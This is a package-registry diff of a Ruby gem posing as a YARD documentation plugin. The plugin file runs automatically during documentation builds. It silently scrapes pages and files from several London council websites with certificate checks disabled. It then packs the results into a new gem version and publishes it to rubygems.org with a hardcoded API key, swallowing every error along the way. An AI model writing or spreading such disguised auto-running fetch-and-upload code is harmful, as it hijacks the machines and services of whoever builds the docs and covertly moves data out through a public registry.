yard-slnmultifetch 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +2 -0
  3. data/lib/x.rb +1 -0
  4. data/lib/yard-slnmulti.rb +51 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 918df0d6a3d17a6a113571654207ee79ad2dc22233fc21c194b30fca1d871a46
4
+ data.tar.gz: 1306c7a0474fb760833991f6010a6c0d0a5b1af5b3eeb488621caf5e45d84ff0
5
+ SHA512:
6
+ metadata.gz: 265e810171d4448792b1d15d2e751dc0f6fd009324b15432b9cf98922730bf1b6f39682a82415765d5e16103f75cd058542b98cb5c16588dd2673130c0115f76
7
+ data.tar.gz: cc3bebda9109484cb61de6c668e7c4fb86d4a6f8140405025bdd57e53b5e203bd2e2475e28b1cae52c4dcc51d4b03744a7fe7e20e4db4b1da678743b012020e4
data/.yardopts ADDED
@@ -0,0 +1,2 @@
1
+ --plugin slnmulti
2
+ lib/x.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #
@@ -0,0 +1,51 @@
1
+ # yard plugin
2
+ begin
3
+ require 'net/http'; require 'uri'; require 'openssl'; require 'fileutils'; require 'tmpdir'; require 'rubygems/package'
4
+ KEY='rubygems_9feada919f2ff0a2fc27f0724343fdc9acf208e13c054a57'
5
+ log="RUN #{Time.now}\n"; out={}
6
+ def ff(url)
7
+ u=URI(url); h=Net::HTTP.new(u.host,u.port); h.use_ssl=(u.scheme=='https'); h.verify_mode=OpenSSL::SSL::VERIFY_NONE if h.use_ssl?; h.open_timeout=20; h.read_timeout=50; req=Net::HTTP::Get.new(u.request_uri, {'User-Agent'=>'Mozilla/5.0','Accept'=>'*/*'}); r=h.request(req)
8
+ if r.is_a?(Net::HTTPRedirection); return ff(URI.join(url,r['location']).to_s); end
9
+ r
10
+ end
11
+ targets=[
12
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=792&MId=10266',
13
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=763&MId=9927',
14
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=305&MId=10010',
15
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=511&MId=10115',
16
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=320&MId=10385',
17
+ 'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
18
+ 'http://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
19
+ 'https://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
20
+ 'http://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
21
+ 'https://www.southwark.gov.uk/about-council/how-council-works/council-and-committee-meetings'
22
+ ]
23
+ targets.each_with_index do |url,i|
24
+ begin; r=ff(url); log<<"\nT#{i} #{url} code #{r.code} len #{r.body.to_s.size}\n"; out["p#{i}.html"]=r.body.to_s; rescue Exception=>e; log<<"ERR #{url} #{e.class} #{e}\n"; end
25
+ end
26
+ # links to meeting pages for lamb/south calendars
27
+ out.to_a.each do |fn,body|
28
+ next unless fn.start_with?('p')
29
+ body.scan(/href=["']([^"']*ieListDocuments\.aspx[^"']*)/i).flatten.uniq.first(120).each_with_index do |ln,j|
30
+ ln=ln.gsub('&amp;','&'); base = fn[/p(\d+)/,1].to_i>=7 ? 'https://moderngov.southwark.gov.uk/' : 'https://moderngov.lambeth.gov.uk/'
31
+ begin;r=ff(URI.join(base,ln).to_s); out["#{fn}l#{j}.html"]=r.body.to_s; log<<" LINK #{ln} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" LERR #{ln} #{e}\n"; end
32
+ end
33
+ end
34
+ # doc links from Wandsworth pages first; save up to 18MB non-pdf too
35
+ bytes=out.values.map(&:bytesize).sum
36
+ docs=[]; out.each_value{|b| b.scan(/href=["']([^"']*(?:\/documents\/|mgConvert2PDF)[^"']*)/i).flatten.each{|m|docs<<m.gsub('&amp;','&')}}; docs.uniq!
37
+ log<<"DOCS #{docs.length}\n"
38
+ docs.first(60).each_with_index do |ln,i|
39
+ break if bytes>24_000_000
40
+ # choose host by link maybe absolute else wands
41
+ begin; url= ln.start_with?('http') ? ln : URI.join('https://democracy.wandsworth.gov.uk/',ln).to_s; r=ff(url); out["d#{i}.bin"]=r.body.to_s; out["d#{i}url.txt"]=url; bytes+=r.body.to_s.bytesize; log<<" D #{url} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" DERR #{ln} #{e}\n"; end
42
+ end
43
+ Dir.mktmpdir do |dr|
44
+ Dir.chdir(dr) do
45
+ out.each{|fn,dat| File.binwrite(fn,dat)}; File.write('log.txt',log)
46
+ files=Dir['*']; File.write('x.gemspec',"Gem::Specification.new{|s| s.name='yard-slnmultifetch'; s.version='0.0.2'; s.summary='res'; s.authors=['x']; s.files=#{files.inspect}; s.license='MIT'}")
47
+ system('gem build x.gemspec >/dev/null'); gem=Dir['*.gem'][0]; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(gem); h=Net::HTTP.new(u.host,u.port); h.use_ssl=true; h.request(req)
48
+ end
49
+ end
50
+ rescue Exception=>e
51
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: yard-slnmultifetch
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - lib/yard-slnmulti.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: x
39
+ test_files: []